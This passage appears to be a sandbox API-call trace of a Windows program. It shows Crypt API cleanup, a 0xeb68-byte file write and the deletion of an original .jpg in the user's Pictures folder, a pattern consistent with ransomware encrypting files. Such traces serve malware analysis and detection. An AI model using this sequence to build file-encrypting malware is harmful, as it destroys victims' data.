wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.866] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.866] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.866] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.866] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.866] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.866] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.866] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.866] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.866] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.866] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.866] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.866] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.866] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.867] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.867] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.872] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.872] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.872] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.873] WriteFile (in: hFile=0x520, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xeb68, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xeb68, lpOverlapped=0x0) returned 1 [0209.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.874] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0209.874] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.875] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0209.875] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.875] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.875] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.875] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.875] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.875] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.875] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab020, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0209.875] CryptDestroyKey (hKey=0x9e2138) returned 1 [0209.875] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.875] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.875] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.875] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.875] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.875] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.875] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.875] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.875] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.875] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.876] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.876] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.876] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.876] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.876] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.876] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.876] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.876] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.876] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.876] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.876] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.877] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.877] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.877] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.877] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.877] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.877] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.877] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.877] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.877] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.877] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.877] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.877] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.877] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.877] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.877] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.877] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.877] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.877] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.877] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0209.877] CryptReleaseContext (hProv=0xa7bf78, dwFlags=0x0) returned 1 [0209.878] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.878] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.878] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.878] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.878] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.878] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.878] FreeLibrary (hLibModule=0x76390000) returned 1 [0209.878] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.878] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.878] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.878] CloseHandle (hObject=0x4dc) returned 1 [0209.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.880] CloseHandle (hObject=0x520) returned 1 [0209.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.885] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.885] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.885] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.885] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/EHKlEyoM3xoIg8ms.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\EHKlEyoM3xoIg8ms.jpg", lpFilePart=0x8cedf4*="EHKlEyoM3xoIg8ms.jpg") returned 0x2d [0209.885] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\EHKlEyoM3xoIg8ms.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ehkleyom3xoig8ms.jpg")) returned 0x20 [0209.886] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\EHKlEyoM3xoIg8ms.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c202c50, ftCreationTime.dwHighDateTime=0x1d5c8a6, ftLastAccessTime.dwLowDateTime=0xf9e92410, ftLastAccessTime.dwHighDateTime=0x1d5c85c, ftLastWriteTime.dwLowDateTime=0xf9e92410, ftLastWriteTime.dwHighDateTime=0x1d5c85c, nFileSizeHigh=0x0, nFileSizeLow=0xeb64, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="EHKlEyoM3xoIg8ms.jpg", cAlternateFileName="EHKLEY~1.JPG")) returned 0x9e2138 [0209.886] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\EHKlEyoM3xoIg8ms.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ehkleyom3xoig8ms.jpg")) returned 1 [0209.889] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c202c50, ftCreationTime.dwHighDateTime=0x1d5c8a6, ftLastAccessTime.dwLowDateTime=0xf9e92410, ftLastAccessTime.dwHighDateTime=0x1d5c85c, ftLastWriteTime.dwLowDateTime=0xf9e92410, ftLastWriteTime.dwHighDateTime=0x1d5c85c, nFileSizeHigh=0x0, nFileSizeLow=0xeb64, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="EHKlEyoM3xoIg8ms.jpg", cAlternateFileName="EHKLEY~1.JPG")) returned 0 [0209.889] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0209.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.889] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0209.889] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.890] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0209.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.891] HeapFree 